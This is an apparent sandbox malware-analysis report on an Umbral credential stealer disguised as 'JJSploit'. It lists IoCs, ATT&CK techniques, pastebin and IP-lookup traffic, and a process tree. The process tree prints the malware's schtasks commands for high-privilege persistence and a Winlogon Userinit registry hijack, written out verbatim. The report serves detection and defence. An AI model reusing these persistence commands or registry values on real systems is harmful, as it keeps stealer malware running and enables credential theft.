umbral | 4fcb4f976aa56b66a598ffe94ff636265de995840c64470035662111e8702cd1

Analysis

max time kernel
600s
max time network
600s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
12-01-2025 05:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEW_JJSploit.zip
Size

408KB
MD5

2791f19789ee184e7d17a4a6ecf5a84f
SHA1

7837b2d22748d31368784e88e25ce5890a76a8c7
SHA256

4fcb4f976aa56b66a598ffe94ff636265de995840c64470035662111e8702cd1
SHA512

d7fca2820467ce21412ed27f375d87c33f4e5f5745e34aa8720a53fb36323c12f9efc5d7fd878b5e3cfb6af1f470d3588bbcd95d040c5784a588af279ec077c9
SSDEEP

12288:uTOWtfmeUes659ELUOkdRe6c5uqbvAzC/Z7qth:xgme15QUefbvZ7yh

Score

10^/10

umbral discovery execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Detect Umbral payload 4 IoCs

resource	yara_rule
behavioral1/files/0x00280000000460e6-44.dat	family_umbral
behavioral1/files/0x0028000000046117-64.dat	family_umbral
behavioral1/memory/2456-74-0x000001E887660000-0x000001E8876A0000-memory.dmp	family_umbral
behavioral1/memory/1528-76-0x0000000000400000-0x0000000000E4E000-memory.dmp	family_umbral

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Windows\\xdwdWPS.exe"	JJSploit.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3644	powershell.exe
856	powershell.exe
4224	powershell.exe
2500	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1006597246-3150276181-3318461161-1000\Control Panel\International\Geo\Nation	JJSploit.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1006597246-3150276181-3318461161-1000\Control Panel\International\Geo\Nation	xdwdSkype.exe

Executes dropped EXE 5 IoCs

pid	Process
1528	JJSploit.exe
864	JJSploit.exe
2456	Umbral.exe
2824	xdwdSkype.exe
4688	xdwdWPS.exe

Loads dropped DLL 64 IoCs

pid	Process
4612	Process not Found
2256	Process not Found
876	Process not Found
1044	Process not Found
3772	Process not Found
4576	Process not Found
4432	Process not Found
548	Process not Found
4588	Process not Found
1084	Process not Found
4668	Process not Found
3932	Process not Found
5004	Process not Found
376	Process not Found
2352	Process not Found
2336	Process not Found
3764	Process not Found
1084	Process not Found
4960	Process not Found
1768	Process not Found
1224	Process not Found
2192	Process not Found
5104	Process not Found
4496	Process not Found
4504	Process not Found
2544	Process not Found
4568	Process not Found
3076	Process not Found
476	Process not Found
3948	Process not Found
3736	Process not Found
2352	Process not Found
2708	Process not Found
4592	Process not Found
3636	Process not Found
3552	Process not Found
2868	Process not Found
1440	Process not Found
1148	Process not Found
4612	Process not Found
2560	Process not Found
3836	Process not Found
3632	Process not Found
4964	Process not Found
4272	Process not Found
5068	Process not Found
4716	Process not Found
1640	Process not Found
2520	Process not Found
4348	Process not Found
4452	Process not Found
4728	Process not Found
4636	Process not Found
4960	Process not Found
1948	Process not Found
1772	Process not Found
892	Process not Found
2996	Process not Found
2352	Process not Found
2764	Process not Found
3972	Process not Found
1036	Process not Found
3924	Process not Found
4396	Process not Found

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1006597246-3150276181-3318461161-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinDP = "C:\\Users\\Admin\\xdwdSkype.exe"	JJSploit.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
732	pastebin.com
154	pastebin.com
247	pastebin.com
332	pastebin.com
522	pastebin.com
610	pastebin.com
504	pastebin.com
552	pastebin.com
621	pastebin.com
701	pastebin.com
812	pastebin.com
490	pastebin.com
573	pastebin.com
594	pastebin.com
122	pastebin.com
223	pastebin.com
308	pastebin.com
310	pastebin.com
381	pastebin.com
741	pastebin.com
757	pastebin.com
99	pastebin.com
158	pastebin.com
188	pastebin.com
575	pastebin.com
708	pastebin.com
426	pastebin.com
529	pastebin.com
561	pastebin.com
118	pastebin.com
167	pastebin.com
203	pastebin.com
298	pastebin.com
354	pastebin.com
775	pastebin.com
799	pastebin.com
593	pastebin.com
631	pastebin.com
700	pastebin.com
721	pastebin.com
743	pastebin.com
198	pastebin.com
252	pastebin.com
739	pastebin.com
827	pastebin.com
663	pastebin.com
671	pastebin.com
683	pastebin.com
56	pastebin.com
240	pastebin.com
259	pastebin.com
639	pastebin.com
643	pastebin.com
704	pastebin.com
369	pastebin.com
521	pastebin.com
653	pastebin.com
715	pastebin.com
783	pastebin.com
144	pastebin.com
392	pastebin.com
679	pastebin.com
193	pastebin.com
313	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	ip-api.com

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\xdwdWPS.exe	JJSploit.exe
File opened for modification	C:\Windows\xdwdWPS.exe	JJSploit.exe
File created	C:\Windows\xdwd.dll	JJSploit.exe
File opened for modification	C:\Windows\xdwdWPS.exe	xdwdSkype.exe
File opened for modification	C:\Windows\xdwdWPS.exe	xdwdWPS.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JJSploit.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3988	cmd.exe
3940	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2200	wmic.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	xdwdSkype.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3940	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4584	schtasks.exe
1768	schtasks.exe
2280	schtasks.exe
2864	schtasks.exe
3032	schtasks.exe
1220	schtasks.exe
1748	schtasks.exe
1744	schtasks.exe
2932	schtasks.exe
1056	schtasks.exe
4000	schtasks.exe
3300	schtasks.exe
1540	schtasks.exe
4588	schtasks.exe
1044	schtasks.exe
408	schtasks.exe
4048	schtasks.exe
2280	schtasks.exe
2100	schtasks.exe
2416	schtasks.exe
1384	schtasks.exe
4548	schtasks.exe
3128	schtasks.exe
5060	schtasks.exe
1164	schtasks.exe
648	schtasks.exe
3424	schtasks.exe
2792	schtasks.exe
568	schtasks.exe
3976	schtasks.exe
3204	schtasks.exe
1088	schtasks.exe
2808	schtasks.exe
228	schtasks.exe
2320	schtasks.exe
1352	schtasks.exe
724	schtasks.exe
4960	schtasks.exe
1540	schtasks.exe
3556	schtasks.exe
1588	schtasks.exe
2040	schtasks.exe
4688	schtasks.exe
4656	schtasks.exe
3920	schtasks.exe
4844	schtasks.exe
5008	schtasks.exe
3136	schtasks.exe
1164	schtasks.exe
3628	schtasks.exe
2844	schtasks.exe
4036	schtasks.exe
3180	schtasks.exe
784	schtasks.exe
2352	schtasks.exe
2812	schtasks.exe
3940	schtasks.exe
3684	schtasks.exe
1796	schtasks.exe
4904	schtasks.exe
1560	schtasks.exe
2972	schtasks.exe
1776	schtasks.exe
3848	schtasks.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

pid	Process
2500	powershell.exe
2500	powershell.exe
856	powershell.exe
856	powershell.exe
4224	powershell.exe
4224	powershell.exe
4252	powershell.exe
4252	powershell.exe
4764	wmic.exe
4764	wmic.exe
4764	wmic.exe
4764	wmic.exe
724	wmic.exe
724	wmic.exe
724	wmic.exe
724	wmic.exe
1224	wmic.exe
1224	wmic.exe
1224	wmic.exe
1224	wmic.exe
3644	powershell.exe
3644	powershell.exe
2200	wmic.exe
2200	wmic.exe
2200	wmic.exe
2200	wmic.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe
2824	xdwdSkype.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4696	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4696	7zFM.exe
Token: 35	4696	7zFM.exe
Token: SeSecurityPrivilege	4696	7zFM.exe
Token: SeDebugPrivilege	864	JJSploit.exe
Token: SeDebugPrivilege	2456	Umbral.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeIncreaseQuotaPrivilege	2500	powershell.exe
Token: SeSecurityPrivilege	2500	powershell.exe
Token: SeTakeOwnershipPrivilege	2500	powershell.exe
Token: SeLoadDriverPrivilege	2500	powershell.exe
Token: SeSystemProfilePrivilege	2500	powershell.exe
Token: SeSystemtimePrivilege	2500	powershell.exe
Token: SeProfSingleProcessPrivilege	2500	powershell.exe
Token: SeIncBasePriorityPrivilege	2500	powershell.exe
Token: SeCreatePagefilePrivilege	2500	powershell.exe
Token: SeBackupPrivilege	2500	powershell.exe
Token: SeRestorePrivilege	2500	powershell.exe
Token: SeShutdownPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeSystemEnvironmentPrivilege	2500	powershell.exe
Token: SeRemoteShutdownPrivilege	2500	powershell.exe
Token: SeUndockPrivilege	2500	powershell.exe
Token: SeManageVolumePrivilege	2500	powershell.exe
Token: 33	2500	powershell.exe
Token: 34	2500	powershell.exe
Token: 35	2500	powershell.exe
Token: 36	2500	powershell.exe
Token: SeDebugPrivilege	856	powershell.exe
Token: SeDebugPrivilege	4224	powershell.exe
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeIncreaseQuotaPrivilege	4764	wmic.exe
Token: SeSecurityPrivilege	4764	wmic.exe
Token: SeTakeOwnershipPrivilege	4764	wmic.exe
Token: SeLoadDriverPrivilege	4764	wmic.exe
Token: SeSystemProfilePrivilege	4764	wmic.exe
Token: SeSystemtimePrivilege	4764	wmic.exe
Token: SeProfSingleProcessPrivilege	4764	wmic.exe
Token: SeIncBasePriorityPrivilege	4764	wmic.exe
Token: SeCreatePagefilePrivilege	4764	wmic.exe
Token: SeBackupPrivilege	4764	wmic.exe
Token: SeRestorePrivilege	4764	wmic.exe
Token: SeShutdownPrivilege	4764	wmic.exe
Token: SeDebugPrivilege	4764	wmic.exe
Token: SeSystemEnvironmentPrivilege	4764	wmic.exe
Token: SeRemoteShutdownPrivilege	4764	wmic.exe
Token: SeUndockPrivilege	4764	wmic.exe
Token: SeManageVolumePrivilege	4764	wmic.exe
Token: 33	4764	wmic.exe
Token: 34	4764	wmic.exe
Token: 35	4764	wmic.exe
Token: 36	4764	wmic.exe
Token: SeIncreaseQuotaPrivilege	4764	wmic.exe
Token: SeSecurityPrivilege	4764	wmic.exe
Token: SeTakeOwnershipPrivilege	4764	wmic.exe
Token: SeLoadDriverPrivilege	4764	wmic.exe
Token: SeSystemProfilePrivilege	4764	wmic.exe
Token: SeSystemtimePrivilege	4764	wmic.exe
Token: SeProfSingleProcessPrivilege	4764	wmic.exe
Token: SeIncBasePriorityPrivilege	4764	wmic.exe
Token: SeCreatePagefilePrivilege	4764	wmic.exe
Token: SeBackupPrivilege	4764	wmic.exe
Token: SeRestorePrivilege	4764	wmic.exe
Token: SeShutdownPrivilege	4764	wmic.exe
Token: SeDebugPrivilege	4764	wmic.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4696	7zFM.exe
4696	7zFM.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1528 wrote to memory of 864	1528	JJSploit.exe	94
PID 1528 wrote to memory of 864	1528	JJSploit.exe	94
PID 1528 wrote to memory of 2456	1528	JJSploit.exe	95
PID 1528 wrote to memory of 2456	1528	JJSploit.exe	95
PID 2456 wrote to memory of 1744	2456	Umbral.exe	96
PID 2456 wrote to memory of 1744	2456	Umbral.exe	96
PID 2456 wrote to memory of 2500	2456	Umbral.exe	98
PID 2456 wrote to memory of 2500	2456	Umbral.exe	98
PID 2456 wrote to memory of 856	2456	Umbral.exe	101
PID 2456 wrote to memory of 856	2456	Umbral.exe	101
PID 2456 wrote to memory of 4224	2456	Umbral.exe	103
PID 2456 wrote to memory of 4224	2456	Umbral.exe	103
PID 2456 wrote to memory of 4252	2456	Umbral.exe	105
PID 2456 wrote to memory of 4252	2456	Umbral.exe	105
PID 2456 wrote to memory of 4764	2456	Umbral.exe	107
PID 2456 wrote to memory of 4764	2456	Umbral.exe	107
PID 2456 wrote to memory of 724	2456	Umbral.exe	109
PID 2456 wrote to memory of 724	2456	Umbral.exe	109
PID 2456 wrote to memory of 1224	2456	Umbral.exe	111
PID 2456 wrote to memory of 1224	2456	Umbral.exe	111
PID 2456 wrote to memory of 3644	2456	Umbral.exe	113
PID 2456 wrote to memory of 3644	2456	Umbral.exe	113
PID 2456 wrote to memory of 2200	2456	Umbral.exe	115
PID 2456 wrote to memory of 2200	2456	Umbral.exe	115
PID 2456 wrote to memory of 3988	2456	Umbral.exe	117
PID 2456 wrote to memory of 3988	2456	Umbral.exe	117
PID 3988 wrote to memory of 3940	3988	cmd.exe	119
PID 3988 wrote to memory of 3940	3988	cmd.exe	119
PID 864 wrote to memory of 5008	864	JJSploit.exe	121
PID 864 wrote to memory of 5008	864	JJSploit.exe	121
PID 5008 wrote to memory of 1800	5008	CMD.exe	123
PID 5008 wrote to memory of 1800	5008	CMD.exe	123
PID 864 wrote to memory of 4016	864	JJSploit.exe	124
PID 864 wrote to memory of 4016	864	JJSploit.exe	124
PID 4016 wrote to memory of 1820	4016	CMD.exe	126
PID 4016 wrote to memory of 1820	4016	CMD.exe	126
PID 864 wrote to memory of 2084	864	JJSploit.exe	127
PID 864 wrote to memory of 2084	864	JJSploit.exe	127
PID 2084 wrote to memory of 1356	2084	CMD.exe	129
PID 2084 wrote to memory of 1356	2084	CMD.exe	129
PID 864 wrote to memory of 4852	864	JJSploit.exe	130
PID 864 wrote to memory of 4852	864	JJSploit.exe	130
PID 4852 wrote to memory of 464	4852	CMD.exe	132
PID 4852 wrote to memory of 464	4852	CMD.exe	132
PID 864 wrote to memory of 4480	864	JJSploit.exe	133
PID 864 wrote to memory of 4480	864	JJSploit.exe	133
PID 4480 wrote to memory of 1112	4480	CMD.exe	135
PID 4480 wrote to memory of 1112	4480	CMD.exe	135
PID 864 wrote to memory of 1252	864	JJSploit.exe	136
PID 864 wrote to memory of 1252	864	JJSploit.exe	136
PID 1252 wrote to memory of 4960	1252	CMD.exe	138
PID 1252 wrote to memory of 4960	1252	CMD.exe	138
PID 864 wrote to memory of 784	864	JJSploit.exe	139
PID 864 wrote to memory of 784	864	JJSploit.exe	139
PID 784 wrote to memory of 1164	784	CMD.exe	141
PID 784 wrote to memory of 1164	784	CMD.exe	141
PID 864 wrote to memory of 3636	864	JJSploit.exe	142
PID 864 wrote to memory of 3636	864	JJSploit.exe	142
PID 3636 wrote to memory of 648	3636	CMD.exe	144
PID 3636 wrote to memory of 648	3636	CMD.exe	144
PID 864 wrote to memory of 4568	864	JJSploit.exe	145
PID 864 wrote to memory of 4568	864	JJSploit.exe	145
PID 4568 wrote to memory of 4464	4568	CMD.exe	147
PID 4568 wrote to memory of 4464	4568	CMD.exe	147

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1744	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\NEW_JJSploit.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4696

C:\Users\Admin\Desktop\JJSploit.exe
"C:\Users\Admin\Desktop\JJSploit.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1528
- C:\Users\Admin\AppData\Local\Temp\JJSploit.exe
  "C:\Users\Admin\AppData\Local\Temp\JJSploit.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:864
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "DullWave_Cheat" /tr "C:\Windows\xdwdWPS.exe" & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5008
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "DullWave_Cheat" /tr "C:\Windows\xdwdWPS.exe"
      4⤵
      PID:1800
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4016
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1820
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "nextup" /tr "C:\Users\Admin\xdwdSkype.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2084
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "nextup" /tr "C:\Users\Admin\xdwdSkype.exe" /RL HIGHEST
      4⤵
      PID:1356
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:464
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4480
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1112
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1252
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4960
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:784
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1164
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3636
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:648
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4568
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4464
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4680
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3140
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4416
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3008
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3504
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2016
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1272
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4012
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2536
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:724
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1732
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2220
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4248
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1560
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3780
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3704
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1356
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2764
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4348
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:956
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2988
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3636
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4640
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1220
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:632
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:760
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1744
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:60
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3108
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3628
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3400
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3976
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4904
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4584
